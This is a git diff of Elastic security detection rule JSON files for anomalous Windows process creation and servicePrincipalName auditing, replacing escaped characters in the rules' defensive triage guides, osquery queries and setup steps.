!{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Anomalous Windows Process Creation\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect an anomalous Windows process with an unusual parent-child relationship, which could indicate malware execution or persistence activities on the host machine.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_104.json b/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_104.json index b33aa1cd584..3432b4c2f83 100644 --- a/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_104.json +++ b/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_104.json @@ -15,7 +15,7 @@ "v3_windows_anomalous_process_creation" ], "name": "Anomalous Windows Process Creation", - "note": "## Triage and analysis\n\n### Investigating Anomalous Windows Process Creation\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect an anomalous Windows process with an unusual parent-child relationship, which could indicate malware execution or persistence activities on the host machine.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Anomalous Windows Process Creation\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect an anomalous Windows process with an unusual parent-child relationship, which could indicate malware execution or persistence activities on the host machine.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_105.json b/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_105.json index 10199a27456..bcf840943c3 100644 --- a/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_105.json +++ b/packages/security_detection_engine/kibana/security_rule/0b29cab4-dbbd-4a3f-9e8e-1287c7c11ae5_105.json @@ -15,7 +15,7 @@ "v3_windows_anomalous_process_creation" ], "name": "Anomalous Windows Process Creation", - "note": "## Triage and analysis\n\n### Investigating Anomalous Windows Process Creation\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect an anomalous Windows process with an unusual parent-child relationship, which could indicate malware execution or persistence activities on the host machine.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Anomalous Windows Process Creation\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect an anomalous Windows process with an unusual parent-child relationship, which could indicate malware execution or persistence activities on the host machine.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], @@ -43,7 +43,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_105.json b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_105.json index afe7d4765e8..752f65e8461 100644 --- a/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_105.json +++ b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_105.json @@ -62,7 +62,7 @@ ], "risk_score": 73, "rule_id": "0b2f3da5-b5ec-47d1-908b-6ebb74814289", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID f3a64788-5306-11d1-a9c5-0000f80367c1 -AuditFlags Success\n```", "severity": "high", "tags": [ "Elastic", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_106.json b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_106.json index 289bd90695a..36d7eb27f9d 100644 --- a/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_106.json +++ b/packages/security_detection_engine/kibana/security_rule/0b2f3da5-b5ec-47d1-908b-6ebb74814289_106.json @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "0b2f3da5-b5ec-47d1-908b-6ebb74814289", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the servicePrincipalName Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 